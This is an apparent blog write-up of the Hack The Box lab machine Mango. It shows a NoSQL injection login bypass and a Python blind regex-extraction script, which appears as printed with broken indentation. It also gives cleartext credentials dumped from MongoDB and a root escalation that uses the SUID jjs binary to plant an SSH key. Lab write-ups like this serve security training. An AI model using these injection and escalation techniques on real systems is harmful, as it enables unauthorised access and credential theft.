Hack The Box – Mango Writeup | 10.10.10.162

Hello, I’m back with another active Hack The Box machine Mango writeup. Mango is a medium difficulty Linux machine.

Lets start with adding 10.10.10.162 to etc/hosts file as mango.htb

➜  mango nmap -Pn -A -p- mango.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-06 21:56 +03
Nmap scan report for mango.htb (10.10.10.162)
Host is up (0.13s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/27%OT=22%CT=1%CU=40958%PV=Y%DS=2%DC=T%G=Y%TM=5DB5BB
OS:DC%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)EC
OS:N(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
 
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   130.60 ms 10.10.14.1
2   130.83 ms mango.htb (10.10.10.162)
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

So, I found 3 useful ports, an SSH 22, a TCP 80 and 443. I started with default webpage, but there was nothing, but a secure page revealed a seach engine like a page.

Other than this page, nothing interesting found, so I went on investigating the certificate because I saw “staging-order.mango.htb” in the nmap results. The certificate of a subdomain I mentioned above, I immediately added it to etc/hosts. Browsing staging-order.mango.htb opened a simple login page:

After analyzing the webpoage I found that the box is running MongoBD as a Backend database. MongoDB is a NoSQL database, so to exploit it we need NoSQL exploiter.

I went looking for MongoDB NoSQL injections I found PayloadsAllTheThings ( https://github.com/swisskyrepo/PayloadsAllTheThings ) has NoSQL injection script. The Github git repo has NoSQL nosql blind injections which may help me.

Before the exploit, I logged-in the page and intercept it using Burpsuit. I add [$ne] after username and password and forward the request, The MongoDB was vunerable because, I got the /home.php without password. So, I was sure that I can exploit the Database using PayloadAllTheThings.

I made a Python script using this repo (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#extract-data-information).

Here is my script:

import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username='mango'
u='http://staging-order.mango.htb'
password_len = 0
print("searching length")
while True:
	payload = {
		"username": username,
		"password[$regex]": ".{" + str(password_len) + "}",
		"login": "login"
	}
	print("trying length {0}".format(password_len))
	r = requests.post(u, payload)
	if 'admin@mango.htb' not in r.text:
		break
	password_len += 1
password_len -= 1
print(("password length: {0}".format(password_len)))
password = ''
while len(password) != password_len:
	for c in string.printable:
		if c not in ['*','+','.','?','|', '#', '&', '$']:
			payload = {
			"username": username,
			"password[$regex]": "^{0}{1}".format(password, c),
			"login": "login"
	}
	r = requests.post(u, payload)
			print("trying {0}".format(password+c))
			if 'admin@mango.htb' in r.text:
				password += c
				break
print(("password = {0}".format(password)))

After failing several times, I manged to get the script worked and found the credentials of user mango:

mango:h3mXK8RhU~f{]f5H

I made a ssh to mango.htb as user mango and got the access.

➜  mango ssh mango@10.10.10.162
mango@10.10.10.162's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Nov  6 20:00:10 UTC 2019

  System load:  0.0                Processes:            102
  Usage of /:   25.9% of 19.56GB   Users logged in:      0
  Memory usage: 17%                IP address for ens33: 10.10.10.162
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.


Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
mango@mango:~$ 
mango@mango:~$ 
mango@mango:~$ cd /home
mango@mango:/home$ ls
admin  mango
mango@mango:/home$ cd admin
mango@mango:/home/admin$ ls
user.txt
mango@mango:/home/admin$ cat user.txt
cat: user.txt: Permission denied

I tried to get the user.txt already, but the access was denied, so I need admin’s credentials to read user.txt file. I got a hint from someone in the HTB forum that the admin credentials are stored in the MongoDB I can get it easily.

Getting User.txt

A simple google search showed me the commands to get stored credentials and here are they:

mango@mango:/home$ mongo
MongoDB shell version v4.0.12
connecting to: mongodb://127.0.0.1:27017/?gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("d1043da0-88f1-4c13-b80e-b6de2ab48e9b") }
MongoDB server version: 4.0.12
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
	http://docs.mongodb.org/
Questions? Try the support group
	http://groups.google.com/group/mongodb-user
Server has startup warnings: 
2019-11-05T21:14:32.932+0000 I STORAGE  [initandlisten] 
2019-11-05T21:14:32.932+0000 I STORAGE  [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2019-11-05T21:14:32.932+0000 I STORAGE  [initandlisten] **          See http://dochub.mongodb.org/core/prodnotes-filesystem
2019-11-05T21:14:39.575+0000 I CONTROL  [initandlisten] 
2019-11-05T21:14:39.575+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
2019-11-05T21:14:39.575+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
2019-11-05T21:14:39.575+0000 I CONTROL  [initandlisten] 
---
Enable MongoDB's free cloud-based monitoring service, which will then receive and display
metrics about your deployment (disk utilization, CPU, operation statistics, etc).

The monitoring data will be available on a MongoDB website with a unique URL accessible to you
and anyone you share the URL with. MongoDB may use this information to make product
improvements and to suggest MongoDB products and deployment options to you.

To enable free monitoring, run the following command: db.enableFreeMonitoring()
To permanently disable this reminder, run the following command: db.disableFreeMonitoring()
---

> show databases
admin   0.000GB
config  0.000GB
local   0.000GB
mango   0.000GB
> use mango
switched to db mango
> show tables
users
> db.users.find().pretty()
{
	"_id" : ObjectId("5d8e25334f3bf1432628927b"),
	"username" : "admin",
	"password" : "t9KcS3>!0B#2"
}
{
	"_id" : ObjectId("5d8e25364f3bf1432628927c"),
	"username" : "mango",
	"password" : "h3mXK8RhU~f{]f5H"
}

Ok, here I got the user.txt using the credentials I obtanied above.

mango@mango:/home$ su admin
Password: 
$ 
$ ls
admin  mango
$ cd admin
$ ls
user.txt
$ 
$ cat user.txt
79bf3[xxxxxxxxxx]47e92
$ 

Now, I have SUIDs and I have permissions to use / usr / lib / jvm / java-11-openjdk-amd64 / bin / jjs. I found out that I can execute them with the flag -scripting and execute system commands from there. Evenmtually, I will get the root in that process. So, I’m going to inject my rsa key first.

admin@mango:/home/admin$ /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs -scripting
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> $EXEC("echo 'ssh-rsa AAAAB3NzaC1[--SNIP---]6J7JmtiJM=' > /root/.ssh/authorized_keys");
jjs>

Getting Root.txt

➜  mango ssh -i /root/.ssh/id_rsa mango.htb
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
122 packages can be updated.
18 updates are security updates.
 
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
Last login: Thu Oct 10 08:33:27 2019
root@mango:~# cat root.txt
8a8ef79[xxxxxxxxxx]4e9ab15
root@mango:~#

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
d3fconnull
d3fconnull
3 months ago

Hi Navin, which terminal bash do u use, I love that color scheme?, great articles

Sorry, that action is blocked.